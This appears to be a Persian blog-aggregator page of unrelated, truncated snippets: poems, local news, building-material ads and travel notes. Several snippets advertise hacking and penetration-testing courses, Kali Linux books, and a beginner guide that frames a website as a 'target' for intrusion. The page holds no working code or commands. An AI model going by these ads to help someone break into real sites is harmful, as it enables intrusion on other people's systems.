[+] برای خرید این پکیج و کسب اطلاعات بیشتر به آی دی زیر در تلگرام پیام بدهید:

t.me/virtual_dedicated_server
سخن در نزد من همچون سراب است
دل دیوانه ام حالش خراب است
گل سرخ از ازل بویی ندارد
دلم بی تو هیاهویی  ندارد
اگرچه با تو شادم و جوانم
چو نیستی همچو بیدی مرده سانم
تو را دیدم که زیبایی چو دریا
دل دیوانه ام دارد تمنا
دل مرغِ قفس آوا ندارد
هوا سرد است و نایش نا ندارد
به بالم دست گیر و مرحمش کن
بخوان نغمه که صوتت تا ندارد
کنون آید همی شعرم به پایان
چرا کین دل، دل گفتن ندارد
اگرچه هست صحبت های بسیار
ولی حرف زیاد، گفتن ندارد
پر بی بال من را تو دوا کن
دل دیو
خیلی از اوقات ، پیش اومده که دچار حمله هکرها و یا نفوذ ویروس و تروجان از طریق نرم افزارهای مختلف شدیم ؛ اما به جای اینکه خونسردی خودمون رو حفظ کنیم ، کارهایی کردیم که کار هکینگ رو برای فرد سازنده ویروس ، راحت تر کرده .
در این پست ، روش هایی رو معرفی خواهیم کرد که احتمال نفوذ و سواستفاده تروجان ها رو از سیستم شما ، به حداقل میرسونه
ادامه مطلب

ارغوان را خیلی دوست داشتم. مدت زیادی با من و درخیالم بود. هرجا که می رفتم، هرجا که می خوابیدم ، حتی در نفس کشیدن هایم.
   شعرهایم برای او بود. داستان هایم از او بود و حتی راز و نیازم برای او بود. پناه بر خدا ! گاهی انگار جای خدا هم می نشست . چون از زیبایی بهره ای برده بود . گاهی فکر می کرد الهه ی زیبایی ست و دوست داشت تمام سیم و زر دنیا را در پایش نثار کنند. اما من فقط می توانستم ردای کسی را بر دوش داشته باشم که اندک حسی عاشقانه در قالب کلمات بریزد و
کتاب طُرقهشاعر: وحید جلالی

از گلی رنگ و بو نمی خواهماز کسی پرس و جو نمی خواهممی نشینم به کنج خلوت خویشبعد از این های و هو نمی خواهمهر کس از هر کسی که پیغامیمی رساند، بگو نمی خواهمآرزو هم سراب موهومی استمن دگر آرزو نمی خواهمچیزی از بختِ مضحک مستپستِ بی آبرو نمی خواهممن دگر بعد از این خودم رابا آینه رو به رو نمی خواهماو که دیگر مرا نمی خواهدمن خودم را چو او نمی خواهمچشم در چشم آینه تا چند؟ من چیزی جز از او نمی خواهم
برای تهیه ی این کتاب می توان
نفوذ کلام یعنی قدرتی که دیگران را با حرف زدن کنترل کنید.
کاری کنید که کلامتان برای دیگران ارزش بالایی داشته باشد تا آنرا بپذیرند و اجرا کنند.

تا به حال آرزو داشتید آنقدر کلام و سخنتان نفوذ داشت که هرچیزی به دیگران میگفتید آنرا قبول یا انجام میدادند؟ آرزوی شما برآورده شد.
شما میتوانید به چنین قدرت و نفوذ کلامی برسید البته لازمه ی آن تمرین زیاد، شور و اشتیاق بالا است که باید قبل از شروع داشته باشید.

در زندگی ما افرادی هستند که ناخودآگاه اطاعت
عایق آب بند نانو بی رنگ در کرج و تهران: مواد آب‌بندی نانو ، به عنوان ماده‌ای همه‌کاره در صنعت ایزولاسیون شناخته می‌شود . این ماده که بر پایه رزین‌های آکریلیک (پایه سیمانی) با فناوری نانو تولید شده است ، پس از اجرا بر روی سطح ، در عمق سازه نفوذ کرده و بافتی نفوذ ناپذیر در مقابل آب و رطوبت ایجاد می‌کند و ضمن فراهم آوردن امکان تنفس سازه‌ای، براحتی فشارهای منفی و مثبت آب را تحمل می‌نماید.

ادامه مطلب
سلام بر دوستان عزیزاین وب جهت آموزشات و ترفند هایی در رابطه با هک و نفوذ و برنامه نویسی ایجاد شده استفعالیت رسمی این وب از هفته آینده شروع میشود و موضوعاتی که در این وب به آن پرداخته میشود:-پکیج ها و بسته های اموزشی در رابطه با انواع زبان های برنامه نویسی-پکیج ها و بسته های اموزشی در رابطه با هک و نفوذ-راه هایی برای افزایش امنیت و مقابله با تروجان ها و انواع رات(کنترل کننده)-و موضوعاتی در این حیطه که به صورت مفصل درباره آن توضیحات و آموزشات ارا
دیگر از باریدن خبری نیست. دیگر از خندیدن اثری نیست زیرا دیگر دوست داشتن در کلبه دلم اقامت نمی کند! مثل همیشه کلمه معروف را بازگو می کنم: پشیمانم...
اما بی تاثیر هست زمانی که ابرها دیگر از این آسمان گذشته اند و از انسانیت به دور است باد را دشنام بگویم!
دوست دارم عصبانی نشوم و دوست دارم بی اختیار گریه کنم. 
 دوست دارم در مقابل آینه به ایستم و رخ در رخ چهره رو به رو بگویم: دوستت دارم...
دوست داشتن چرا اینقد زیبایی؟ 
دوستم داری، دوست داشتن؟
 چه کسیست ک

مهربان در تابستان98

بازار شهرستان سراب تعطیل شد 
به گزارش کانال خبری سراب کلیه واحدهای صنفی سطح شهرستان( سراب ، مهربان ، دوزدوزان ، شربیان )  بغیر از نانوایی ها؛سوپرمارکت ها؛ قصابان و مرغ فروشان؛ فروشندگان کالاهای بهداشتی وداروخانه ها از فردا تا آخر هفته  جهت پیشگیری از شیوع ویروس کرونا تعطیل می باشند . 
 همچنین هرگونه دستفروشی های داخل شهر و میوه فروشی های سیار داخل شهر تعطیل می باشد .
روال خلوت کردن شهرها در ۲۴ ساعت آینده آغاز می‌شو
توصیه های امور آب و فاضلاب شهری روانسردرخصوص جلوگیری از یخ زدگی کنتورآب
با استفاده از خاک اره، پوشال، پارچه، گونی و پشم شیشه کنتورها را بپوشانید.
خاک اره یا پوشاک پارچه را در کیسه‌ای در اطراف کنتورها بریزید.
در زمان یخ‌زدگی از ریختن آب داغ روی کنتورها خودداری کنید؛ زیرا موجب ترکیدگی می‌شود و به جای این کار از کیسه‌ی آب داغ و حرارت غیرمستقیم استفاده کنید
به سراب روانسر بپیوندید
@sarabravansar
[عکس 800×759]
مشاهده مطلب در کانال
رمضان آمد و مهمان تو خواب است خدایا !راه گم کرده و دنبال ثواب است خدایا !
نیست ساقی و زمین یک دل آباد نداردحال مردان خرابات خراب است خدایا !
آبرو با بر و رویی برود گر تو نگیرینقش دینداری ما نقش بر آب است خدایا !
این که، این سوی نقاب است، که دل می‌‌بَرَد از خلقبگذر از آنکه در آن سوی نقاب است خدایا !
کی شود سوی تو بی‌رنگ و سبک بار سفر کرد؟تا که این سفره پر از رنگ و لعاب است، خدایا !
یار در خانه و عمری است که ما گِرد جهانیماین خودش سخت ترین شکل عذاب اس
به گزارش سایت تفریحی چفچفک برگرفته از بیوته  : مرکز لرزه نگاری تبریز اعلام کرد : این زمین لرزه به بزرگی  5.9 (پنج ممیز نه دهم) و کانونش در بخش ترک شهرستان میانه در عمق 2 کیلومتری زمین است.
این زمین لرزه در تبریز و شهرهای اطراف مانند هشترود، مهربان، اسکو بسیار محسوس بود و موجب وحشت مردم آن مناطق شد.هنوز از خسارتهای این زلزله خبری اعلام نشده است.
همچنینین بخوانید:
۵ دستاورد جدید نیروی زمینی ارتش رونمایی شد
جام جهانی والیبال| صعود ۳ پله‌ای ایران در
ما را رها کنید در این رنج بی‌حساب
با قلب پاره پاره و، با سینه‌ای‌ کباب
عمری‌ گذشت در غم هجران روی‌ دوست
مرغم درون آتش و، ماهی‌ بُرونِ آب

حالی‌ نشد نصیبم از این رنج و زندگی‌
پیری‌ رسید غرق بطالت، پس از شباب

از درس و بحث مدرسه‌ام حاصلی‌ نشد
کی‌ می‌توان رشید به دریا ازین سراب؟

هرچه فرا گرفتم و، هرچه ورق زدم
چیزی‌ نبود غیر حجابی‌ پس از حجاب

هان ای‌ عزیز! فصل جوانی‌ بهوش باش!
در پیری‌ از تو، هیچ نیاید بغیر خواب

این جاهِلان که دعوی‌ ارشا
نفوذ سینمایی به لانه«نفاق»

در
آستانه سالگرد حادثه هفتم تیر به‌عنوان یکی از بزرگ‌ترین اقدامات تروریستی
سازمان منافقین هستیم.درباره اقدامات و خیانت‌های این گروهک فیلم‌ها و
سریال‌های زیادی ساخته نشده اما قطعاً یکی از موفق‌ترین آن‌ها «ماجرای نیمروز» است.

ادامه مطلب
تری دی پانل دارای خاصیت ضد حریق میباشد و همانطور که از مشخصات آن پیداست پی میبریم که این محصول در مقابل آتش سوزی و حرارت بالا بسیار مقاوم و مستحکم بوده و هیچگونه آسیبی به آن وارد نمیشود.همچنین تری دی پانل عایقی جهت نفوذ صوت و آلودگی صوتی میباشد و میتواند گزینه ای مناسب برای بیمارستان ها باشد زیرا در این محیط نباید هیچگونه سر و صدایی وجود داشته باشد بدین دلیل که موجب نارضایتی و اذیت و آزار بیماران میباشد. یکی دیگر از خصوصیت های مهم تری دی پانل
دوباره شبو مینویسم به یاد تو تویی که دور گشته ای ز من دوباره چهار صبحخواب نمی رود به چشم خسته م قلم به دستنشسته ام کنج خاطرهطنین آن صدای عاشقانه ات نوازشی به گوش من می کند، عبور میکنم فرو می روم به عمق یک خیال خیال دیدن دوباره ی دویدنت خیال بارانفرار میکنمدور میشوم ازین جهان پر سراب پناه میبرم به قرص خواب یا که جرعه ای شراب فرار میکنم به آسمان آبی قلم مینویسم از دلم ولی نمانده طاقتم، نمیکشمباز افتادم از نفس می نویسد این قلم خودش نشسته
نگفتمت مرو آن جا ، که آشنات منم؟
در این سراب فنا ، چشمه حیات منم.

وگر به خشم روی صد هزار سال ز من
به عاقبت به من آیی ، که منتهات منم.

نگفتمت که به نقش جهان مشو راضی؟
که نقش بند سراپرده رضات، منم. 

نگفتمت که منم بحر و تو یکی ماهی؟
مرو به خشک ، که دریای باصفات منم. 

نگفتمت که تو را رهزنند و سرد کنند؟
که آتش و تبش و گرمی هوات منم. 

نگفتمت که صفت های زشت در تو نهند؟
که گم کنی که سرچشمه صفات منم. 

نگفتمت که مگو کار بنده از چه جهت
نظام گیرد؟ ، خلاق
امروز با ری ری یک عالمه خندیدیم. ری ری برام آهنگ خوند. یه عالمه... بازم چایی خوردم... به معاون تپلوعه و دستیار مشاوره پسته دادم. دیر رسیدم سر کلاس و چون تو راه دویدن از پله ها با مغز افتادم زمین و بچه ها خندیدن موفقیت آمیز وارد کلاس شدم. امتحانو حدود ۱۸ میشم. معده م درد میکنه. قرص خوردم بدتر شد. وسط همه اینا مامانم یه چیزی گفت زدم زیر گریه‌. اون چیزه که شبیه ماگه ولی ماگ نیست و نمیدونم چی چیه اسمشو فردا افتتاحش میکنم. نتیجه شهریور تا دی درس خوندن، یه

غمزه‌ی ناب آن تو ، خوی حجاب آنِ توجلوه چو ماه گر کنی ، کار ثواب آنِ تو
مست کنی مرا اگر ، نوش کنم ز چشم تورقص سماع از من و چنگ و رباب آنِ تو
نَقل به هر فسانه‌ای ، نُقل در این زمانه‌ایتا که به کوچه‌ات شدم ، کوچ و شتاب آنِ تو
در هوسم به تشنگی ، جام شراب سر کشمجام شراب دست تو ، نقش سراب آنِ تو
ای نفست چکامه‌ی سینه‌ی شهد ریز منتنگ گلاب از من و بوی گلاب آنِ تو
راز، درون اسم تو اسم، درون راز توشرب مدام از من و خَمر و شراب آنِ تو
چشم به راه وصل تو دیده‌ی
ّسرآب نیلوفر کرمانشاهسراب نیلوفر کرمانشاه منطقه‌ ای تفریحی توریستی در شهرستان کرمانشاه است که با محیطی فراوان آهسته و دل انگیز هر سال در روزها عید نوروز و روزها فصل تابستان بیشترین مشاهده کننده از سراسر کشور ایران و دنیا را دارااست . سرآب نیلوفر کرمانشاه آکنده‌از گلهای نیلوفر آبی‌رنگ و بوستان ساحلی دوچندان قشنگ می ‌باشد . این سرآب گنجایش بهره‌ دهی آب مضاعف داراست و برای رویش ماهی هم مطلوب است . در سالهای اخیر جهت
مقاله روش های تشخیص نفوذ در اینترنت اشیا
مقاله روش های تشخیص نفوذ در اینترنت اشیا در 69 صفحه با فرمت pdf اینترنت اشیا، امنیت و چالش های پیش روی آن حفاظت از اینترنت اشیاء یک کار پیچیده و دشوار است. در این تحقیق به طور خاص روش های تشخیص نفوذ در اینترنت اشیا و چالش های امنیتی اینترنت اشیاء مورد بحث و بررسی قرار گرفته ...
دریافت فایل
نفوذ هوا به داخل یکی از عوامل موثر در افزایش بار حرارتی ( گرمایی و سرمایی ) ساختمان است . به طوریکه در زمستان نفوذ هوای گرم بیرون موجب افزایش بار سرمایی فضای مورد نظر می شود و در تابستان نیز نفوذ هوای سرد بیرون موجب افزایش بار گرمایی ساختمان می شود.
محاسبه حجم هوای نفوذی یکی از عوامل مهم در محاسبه بار حرارتی ساختمان می باشد که به دو از شیوه های زیر تعیین می شود
 یک - روش حجمی
 V = (v * n) / 60 V
 V: حجم هوای نفوذی بر حسب
 CFM : حجم فضای مورد نظر ( فضایی که هو
برو آسمان خود باش که زمین تو را نمانددو هزار بار مُردی و چنین تو را نماند چه گرفته‌ای ره زیر به سراب و خواب و اوهاممَلِکی و ماهتابی،‌ گِل چین تو را نماند تو که نامدار بودی به جهان روشنی‌هاچه شد این چنین شکستی؟ برو این تو را نماند سر شک ز جان جدا کن به سرشک آفتابیتکاین سَم گلاب‌بوی شکرین تو را نماند برو اوج روح دریاب که کرانه‌ها بگیریفلکت به تاب‌تاب کمرین تو را نماند حلمی از قرارگاه غزلت خطاب آمدبرو آسمان خود باش که زمین تو را نماند
یک ارزش اسلام وقرآن درحجاب است/باچادرتقوا چوهرزن آفتاب است/نور بصیرت میرود تا کل دنیا/زن تابع زهرا وزینب با رباب است/از اهل بیت مصطفی بگرفته الگو/اینک حجاب زن به دنیایک خطاب است/تیرزنان برقلب شیطان عفت اوست/گنج حیا وعفتش پراز ثواب است/بردختران انقلابی آفرین گوی/هرنقشه دشمن برای او سراب است/شیطان تلاشش بی حیایی بین زنهاست/رهروبرای او همیشه درعذاب است/زن باولایت رهرو زهراو زینب/او عاشق راه شهیدان و کتاب است/یاران مهدی مردو زن بسیار دارد/یک ل
 در پست های قبلی هر یک از تست های جعبه سیاه و جعبه سفید به صورت اجمالی مورد بررسی قرار گرفت .
در این بخش میخواهیم به تفاوت بین تست نفوذ جعبه سفید و تست نفوذ جعبه سیاه بپردازیم.
برای مطالعه بیشتر به سایت ما مراجه کنید. www.testerking.ir
مشاوره رایگان
 88976445 -021
#تست_اپ#آموزش_تست_اپلیکیشن#تست_اپلیکیشن#تست_نرم_افزار#تست_اپ_اندروید#تست_اپ_آی_او_اس#تست_وب_سایت
زنگ
درس
فعالیت های انجام شده (تدریس)
فعالیت های خواسته شده (تکلیف)

اول
سبک زندگی 
تدریس راز تعادل +تدریس سراب 
5 صفحه ی بعد را پیش مطالعه کنید 

دوم
شیمی 
تدریس درس 4 +کتاب تکمیلی صفحه ی 23
بعد از درست شدن سایت جزوه درس 4 را پرینت بگرید   

سوم
ادبیات
تدریس صفحه ی 50 کتاب تکمیلی+ 
انشا نویسی
یک شنبه آزمون از  درس 5 تا 8 هم تکمیلی هم وزارتی امتحان گرفته می شود

چهارم
ریاضی 
بازدید کار گروهی +ادامه تدریس تبدیلات هندسی
کتاب تکمیلی صفحه ی 59 سوال 5 و 6 و 7 و
ص

✅مقام معظم رهبری: "در نفوذ بسیار خطرناک جریانی، مجموعه ای از افراد با هدفی دروغین، با روشهای متفاوت با هم مرتبط می شوند تا نگاه آنها به مسائل مختلف به تدریج تغییر کند و شبیه نگاه دشمن شود."
رهبر معظم انقلاب این تغییر نگاه را زمینه ساز تغییر آرمانها، باورها و ارزشها دانستند و گفتند: به این ترتیب بیگانگان، بدون شناخته شدن و به خطر افتادن، اهداف خود را محقق می کنند.
#نفوذ_جریانی

بهارزمانی است که حتیبا کفش های پر از گِل و لای هم حس و حالِ سوت زدن دارید...

"دوگ لارسون"

پ.ن:
من از خزان به بهار از عطش به آب رسیدممن از سیاه‌ترین شب به آفتاب رسیدم
هم از خمار رهیدم، هم از فریب گذشتمکه از سراب به دریایی از شراب رسیدم
به جانب تو زدم نقبی از درون سیاهیبه جلوه‌ٔ تو به خورشید بی‌نقاب رسیدم
اگر نشیب رها کردم و فراز گرفتمبه یاری تو بدین حُسن انتخاب رسیدم
شبی که با تو هم‌آغوش از انجماد گذشتمبه تب، به تاب، به آتش، به التهاب رسیدم
زندگی مثلِ آفتابِ لطیفِ دمِ صبح، خودش را می‌پاشد روی پوستِ دستانم و میخزد در لایه های عمیق وجودم.حالا می‌فهمم که قبل تر ها درکِ من از حیات چقدر محدود بود، چقدر سطحی، چقدر عطر گل ها کم در جانم نفوذ می‌کرد، چقدر لطافتِ باران فقط پوستم را قلقلک می‌داد، از غم فقط اشک بر چشم هایم می‌نشست و آشفتگی مهمانِ دلم می‌شد، و از شادی فقط لب هایم فرم لبخند یا خنده ی بلند می‌گرفت و توی دلم یک چیزی قلقلک می‌شد.
حالا انگار رسیده ام به طبقات تازه تر، نفوذ پذی
کاهش وزن ساختمان به علت سبکی سقف و دیوارهای ساخته شده از پانل سه بعدی
سرعت حمل و نقل و سهولت بالا کشیدن پانل ها در ساختمانهای مرتفع
مقاومت زیاد در برابر نیروهای برشی ناشی از زلزله به علت یکپارچگی سازه
عایق در برابر حرارت ، برودت و رطوبت و صدا .
مقاوم در برابر آتش سوزی به علت وجود قشرهای بتنی طرفین پانل .
نفوذ ناپذیری تری دی پانل در برابر حشرات .
امکان حمل و نقل و بکارگیری دیوار پانل در مناطق صعب العبور جهت احداث ساختمان.
عدم نفوذ نسبی آلودگی ص
سگ سرابی سگی قدرتمند و تنومند با اصالتی ایرانی هست که قدمتش به ایران باستان برمیگرده در کشورمون خیلی پرطرفداره.
جزء گونه سگ‌های ماستیف محسوب می‌شه. به همین خاطر بعضی ها سگ سرابی رو به اسم پرشین ماستیف یا سگ ماستیف ایرانی هم می‌شناسن. به طور کلی ماستیف‌ها به جثه‌ی بزرگ، بدن عضلانی و قدرتمند، و پوزه‌ی آویزنوشون معروفن. البته سگ سرابی نسبت به بقیه نژادهای ماستیف، پوزه‌ی جمع و جورتری داره و فقط لب پایینش یه مقدار آویزونه. زادگاه اصلی سگ سرا
بسم رب الشهدا
پناهگاهی به وسعت عالم
به نظر من پناهگاه سوره ناس میتونه قلعه‌ای نفوذ ناپذیر باشد با وسعتی بسیار زیاد، که نمی توان تصور کرد و این پناهگاه برای همه آدم های  زمین جا دارد.
این پناهگاه نفوذ ناپذیر است اما بعضی از آدم ها به اشتباه و به خاطر طهارت کم دیوار های این قلعه را برای ورود وسواس خناس باز می کند و گاهی اوقات این اتفاق باعث آسیب رسیدن به دیگران می شود.
مثلا کسی که وقتی می خواهی بروی مسجد اجازه نداد و بگوید که یک دست دیگر فوتبال ب
آموزش امنیت در شبکه های بیسیم
در این دوره سعی بر آن شده، با توجه به سرفصل‌های موجود در offensive-security و cwnp، دوره‌ای ساخته شود که دانشجو تمامی ترفند‌های تست نفوذ در وایرلس را درک و فرا گیرد و قادر به انجام آزمون‌های بین‌المللی نیز شود. در این دوره به 0 تا 100 نفوذ و امنیت به وای-فای پرداخته شده است.
سرفصل‌های دوره:آشنایی مقدماتی با تکنولوژی‌های وایرلسآشنایی مقدماتی با پروتکل‌های امنیتی در وایرلسنصب و پیکربندی یک سیستم‌عامل مناسب تست نفوذمعرف

امروز صبح که راه افتادم به سمت محل کار صدای پارس سگ ها مرا ترساند. احساس می کردم در میان راه طعمه ی آنها خواهم شد. چون این روزها عکس ها و فیلم های مستندی از حیات وحش دیده بودم که شامل زندگی خرس های قطبی و گرگ های مناطق سردسیر بود. به پاره پاره شدن گوشت تنم فکر نکرده بودم . فقط یک صدا بود . صدای استخوان هایم را زیر دندان آن درنده ها شنیده و حس کرده بودم. و یا در حالت بسیار دلرحمانه تری لیسیده شدن استخوان های بدنم بود. اما خوب می دانستم که سگ های اط
رو به روی آینه ایستاده بود و موهای بلندش را شانه میزد...خورشید از گوشه ی پنجره ی اتاق دستش را لای موهایش می کشید و نوازشش می کرد ... 
دخترک معصومانه می خندید ... 
انگار که عشقِ مادرانه ی خورشید در قلبش نفوذ کرده بود...
دخترک در آینه به چشمانش لبخند زد ...
هوا ابری شد ... 
طوفان شد ... 
بادِ وحشی زوزه کشان خودش را به شیشه ی پنجره ی اتاق می کوبید ... 
دخترک ترسید ... 
از جلوی آینه کنار رفت ... 
هنوز دستش به دستان ِ پنجره نرسیده بود که پرده های سفید اتاق به رقص د

پروژه کامل روشهای پیش بینی ضریب بهره وری TBM با فرمت ورد در 140 صفحه
 مقدمه:
ضریب بهره وری زمان تکمیل پروژه و به تبع ان هزینه را تحت تاثیر قرار می دهد لذا نقش اساسی در انتخاب شدن یا نشدن حفر مکانیزه به عنوان روش حفر بازی می کند.زمان حفر ماشین به کل زمان پروژه یا عملیات روزانه را ضریب بهره وری می گویند. این ضریب تابعی از شرایط زمین – نوع ماشین – تاسیسات پشتیبانی – مدیریت پروژه و در نهایت تجربه کارکنان است. حاصلضرب نرخ نفوذ در ضریب بهره وری را
سوئیس بهشت زندگی واقعیت یا سراب؟
مرد نابینایی که همسرش هر شب از زیبایی اش برای او تعریف می کرد یک شب مرد خسته شد و گفت تو اگر واقعا این همه که می گویی زیبا بودی چشم دارها با تو ازدواج می کردند و نصیب من نمی شدی.
 نمی توان منکر برخی نکات مثبت در کشورهای مختلف شد اما نرخ بالای خود کشی و مهاجرت خود گویای خیلی از چیز هاست.
 عده ای غرب زده در کشور مدام بر طبل غربزدگی می کوبند و از غرب تعریف می کنند اما جالب است از بهشت غرب بیستر بدانید:
۱.مردم سوئیس با
دانلود کتاب آموزشی تست نفوذ با پایتون
دانلود کتاب آموزشی تست نفوذ با پایتون آموزش پیدا کردن SSID اسکریپت پیدا کردن SSID های مخفی اسکریپت حمله به احرازهویت های ورود ضد حملات به وایرلس ابزار scapy و ... تعداد صفحات raquo; 104 صفحه زبان raquo; فارسی سال انتشار raquo; 96 نویسنده raquo; شریعتی ... ...
دریافت فایل
بهار و تابستان بهترین زمان سفر به سراب نیلوفر است است. چراکه غنچه‎ها و گل‌های تازه نیلوفر، لباس زیبایی به تن این دریاچه می‌پوشانند.

سراب همیشه هم بد نیست،چه رسد به این‎که سراب نیلوفر باشد، در یک منطقه زیبای گردشگری در کرمانشاه. جلوه‌ای بی‌نظیر از طبیعت زیبای ایران.
در این استان، دریاچه‎های متعددی است و مجموعه‌ای از دریاچه‌ها با عنوان سرآب یا سراب شناخته می‎شوند.

سراب نیلوفر
یکی از بی‌نظیر ترین و شاخص‌ترین مجموعه‌های نی
سپیده همش یازده سال و دو ماهو  دوازده روزش بود که فهمید پدر ومادرش دارن از هم جدا میشن شبها به هر بهانه ایی بود خودش رو به اتاق پدر و مادرش میرسوند فهمیده بود چند وقتیه مامان و بابا در اتاق رو قفل نمیکنن...خیلی وقت ها با هم جر وبحث میکردن و دوست نداشتن توی یه اتاق باشن. مامان بهش گفته بود هنوز بابا رو دوست داره اما دیگه نمیتونه باهاش زندگی کنه و به خاطر اینکه بابا و سپیده رو دوست داره میخواد از زندگیشون بره .بابا میگفت مامان رو دوست داره و به خاط
شاید شما هم از اون دسته افرادی باشید که به عقل و هوش و خرد بالای بعضی آدمها غبطه میخورید. و یا به افرادی که همیشه حاضرجواب اند.
اگه میخواید قدرت مغزی و فکری خودتون رو بالا ببرید و مثل این افراد بشید باید بگم که چنین آرزویی اصلا محال نیست. راه حلش هیپنوتیزمه. سری به این لینک بزنید:
خود هیپنوتیزم تقویت توانایی های مغزی (بمب ذهن)
یا شاید در کنارش دوست داشته باشید قدرت سخنوری تون و فن بیان و نفوذ کلامتون رو مثل بعضی افراد بسیار بالا ببرید و همه رو تح
این روزها پایتخت نشینان شاهد هجوم انواع آفات نباتات و نفوذ آن ها حتی به منازل خود هستند. «کرم خراط» و «ملخ» از جمله بدترین آن ها هستند که تاکنون خسارات زیادی را به فضای سبز شهرها و روستاها وارد آورده اند. مرتبط با این موضوع «شهرجدیدپرند» و دیگر شهرستان های همجوار شدیدا زیر هجوم این نوع آفات قرار گرفته اند، این درحالی ست که تاکنون از جانب مسئولین شهرداری و مدیران فضای شهری توصیه جامع و کاملی به جهت آشنایی عموم مردم با این نوع آفات و مبارزه اص
♫♫
کاش راه دوری بین ما بود….
کاش سرنوشت ما جدا بود…
از تو فکر من رها بود…
گر ندیده بودمت ای یار!
عــــشــــــق دیدی خانه ات خراب است!
عــــشــــــق هر چه گفته ای سراب است!
این چه حق انتخاب است….
دگر ندارم خبر از دلدار…
دل توبه کردی و شکستی 
 دل با چه رویی عاشق هستیتو امید هر که بستی 
 رفت و آخرش شدی تنها…من یک غم ادامه دارم
♫   ♫   ♫   ♫
♫   ♫  onemovies  ♫   ♫
♫   ♫   ♫   ♫
 من بغض آخرین قرارمکه هنوز در انتظارم 
 برسی به داد این شب ها…تو هما
این همه حال خراب 
خسته ی بنگ و شراب 
راهیِ راهِ سراب 
شاید این مرد به جایی نرسد 
خواب آشفته ی شب 
همه سرگیجه و تب 
دگران عیش و طرب 
شاید این ناله به گوشی نرسد 
خنده ها، فِیک و دروغ
گم در این شهر شلوغ
گردن مردم و یوغ
شاید این دست به دستی نرسد 
عشقِ آلوده به غم 
 خنده آلوده به سم 
هی دروغ و هی دغل
شاید این حس، همه نفرت بشود

تارگت (Target) چیست؟تارگت در لغت به معنای هدف و واحد است، بر فرض اینکه شما سایتی برای نفوذ در نظر دارید، به این سایت، تارگت یا هدف گفته می شود.
باگ (Bug) چیست؟باگ در زبان انگلیسی به معنای حفره می باشد، باگ ها یا حفره های امنیتی مواردی هستند که در اصل اشکالات برنامه نویسی، برنامه نویسان وب می باشد، که هکر از این اشکالات و خرابی ها می تواند به نفع خود استفاده کند. برنامه نویسان معمولا با انتشار و نصب وصله های امنیتی یا همان پچ (Patch) موجب حذف باگ و جلوگی
***قرار داده شد-در ادامه مطلب دریافت کنید-کاملا رایگان***
***این کتاب در دیگر سایت ها به قیمت35000تومان به فروش میرسد***
توجه:این کتاب کاملا رایگان در سایت بدون رمز قرار داده میشود
موضوعات
1-کالی لینوکس چیست؟
2-.......
3-تست نفوذ+هک
این کتاب طوری نوشته شده که یک فرد کاملا مبتدی با مطالعه و تمرین و تکرار این کتاب میتوانید با کمی تلاش مفاهیم تست و نفوذ را یاد گرفته و از آن ها برای تقویت علوم خود در این زمینه استفاده نماید.

--خواهشمند است اگر اندوخته ای از ا
اخر که میبوسم تو را در انتهای این کتاب♥️اخر بغل می گیرمت در چهار راه انقلاب
اخر که می فهمند همه محو نگاه تو منمیک شب تورا میبوسمت حتی اگر باشد به خواب♥️
هر بار اسمت امده شعری شدی در دفترمشب ها بغضم گریه شد وقتی نبودی وقت خواب♥️
یک بار خوابم امدی از گریه ها دورم کنیگفتی که تو مال منی حالا در اغوشم بخواب♥️
اغوش تو در خواب و چون دیوانه ها بوییدمت♥️ای کاش روزی هم نبود و خواب بودش افتاب
چون ماه دوری و دلم در ارزویت مانده استوقتی به فکرم نیستی
دکتر سایان کیست + بیوگرافی محمد حسین پور امام زمان

محمد حسین پور (سایان) متولد 1367 در سراب، ورزشکار است

فارغ التحصیل دکترای استاتیک پاتولوژی (آسیب شناسی) از دانشگاه ساوانجی استانبول ترکیه بوده و در کنار ورزش، یک نویسنده می باشد که حال ادعای امام زمانی دارد

در این مطلب بیوگرافی دکتر سایان را می خوانید

از روستا تا کرج
محمدی حسین پور در روستای دمیرچی سراب استان آذربایجانشرقی بدنیا آمده است اما بعد از چند سال به همراه خانواده به کرج م
انا کا خول توڑ کر اگرچہ کچھ بکھر گیامگر بفیضِ عشق میں حقیتاً سنور گیاکسوفِ غم سے شمسِ انبساط پائے گا نجاتیہ زندگی کا سلسلہ ظہور تک اگر گیااگر تمہارے عشق کا ہیں ارمغاں، قبول ہیںجنوں کی تہمتیں زمانہ سر مرے جو دھر گیاتمام چاہ خشک تھے ہرایک در پہ قفل تھامگر تمہاری چاہ میں غریب دربدر گیایہ زہر ہجر تلخ ہے مگر اسی کے فیض سےخدا کا شکر جز ترے ہر اعتبار مر گیازمانے کو خبر نہیں، مریض عشق ہوکے چپخود اپنے دل میں کھوجتا ہے چارہ گر کدھر گیابہار رت کے سارے من

تبلیغات

محل تبلیغات شما

آخرین وبلاگ ها

برترین جستجو ها

آخرین جستجو ها